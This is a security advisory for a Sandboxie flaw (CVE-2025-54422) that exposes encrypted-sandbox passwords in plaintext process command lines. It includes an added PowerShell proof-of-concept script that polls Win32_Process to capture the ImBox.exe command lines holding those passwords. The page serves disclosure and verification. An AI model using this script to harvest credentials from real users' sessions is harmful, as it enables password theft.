PT-2025-31199 · Sandboxie · Sandboxie
Love-Code-Yeyixiao · Published 2025-07-29 · Updated 2025-08-04 · CVE-2025-54422
CVSS v4.0: 6.9 (Medium)
| Vector | AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N |
Name of the Vulnerable Software and Affected Versions
Sandboxie versions 1.16.1 and earlier
Description
Sandboxie is sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. Versions up to and including 1.16.1 mishandle the password of an encrypted sandbox. During encrypted sandbox creation the user's password is passed to the helper process through shared memory, where another process in the session could potentially read it. Password changes are worse: both the old and the new password are passed as plaintext command-line arguments to the ImBox process, with no encryption or obfuscation. Any process running in the same user session, including an unprivileged one, can read another process's command line (for example through the Win32_Process WMI class or the target's PEB), so no elevated privilege is needed to recover both passwords.
Recommendations
Update Sandboxie to version 1.16.2 or later.
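The exposure described above can be confirmed from an ordinary, non-elevated user account. The following PowerShell script is an added example, not code from the advisory or from the Sandboxie project. It assumes the helper process is named ImBox.exe (the advisory only calls it "Imbox") and assumes nothing about its argument format: it simply records the full command line of every matching process that appears while the script is running, which is exactly what a malicious process in the session could collect.

```powershell
# Added example (not from the advisory or the Sandboxie project).
# Run as a standard user, without elevation, then create or change the
# password of an encrypted sandbox while the script is watching.
#
# Assumptions (not stated by the advisory):
#   - the helper process image is named ImBox.exe;
#   - nothing about its argument layout; the script only matches on image name.

param(
    [string]$ProcessName = 'ImBox.exe',   # assumption: helper image name
    [int]$Seconds = 60                    # how long to watch
)

$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = [Security.Principal.WindowsPrincipal]$identity
$elevated  = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

Write-Host "Watching for $ProcessName for $Seconds s as $($identity.Name) (elevated: $elevated)"

$seen     = @{}
$deadline = (Get-Date).AddSeconds($Seconds)

while ((Get-Date) -lt $deadline) {
    # Win32_Process.CommandLine is readable for processes in the caller's own
    # session without any special privilege. Polling at 100 ms catches
    # short-lived helpers that exit as soon as they finish their work.
    $procs = Get-CimInstance -ClassName Win32_Process `
                             -Filter "Name = '$ProcessName'" `
                             -ErrorAction SilentlyContinue
    foreach ($p in $procs) {
        if (-not $seen.ContainsKey($p.ProcessId)) {
            $seen[$p.ProcessId] = $true
            [pscustomobject]@{
                Time        = Get-Date -Format 'HH:mm:ss.fff'
                Pid         = $p.ProcessId
                ParentPid   = $p.ParentProcessId
                CommandLine = $p.CommandLine   # where the plaintext passwords land
            } | Format-List
        }
    }
    Start-Sleep -Milliseconds 100
}

Write-Host "Done. $($seen.Count) $ProcessName process(es) observed."
```

If the captured CommandLine contains the passwords, the host is affected. Two practical caveats: the same command line is also recorded by any process-creation telemetry that captures arguments (Sysmon Event ID 1, Windows Security event 4688 with command-line auditing enabled, most EDR agents), so passwords used with an affected version may persist in log stores even after the upgrade and should be changed afterwards; and the command line is only readable by processes running as the same user at the same or lower integrity level, which is precisely the case for any malware that has landed in the user's session.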
CWE-312: Cleartext Storage of Sensitive Information
CWE-522: Insufficiently Protected Credentials
Related Identifiers
CVE-2025-54422
Affected Products
Sandboxie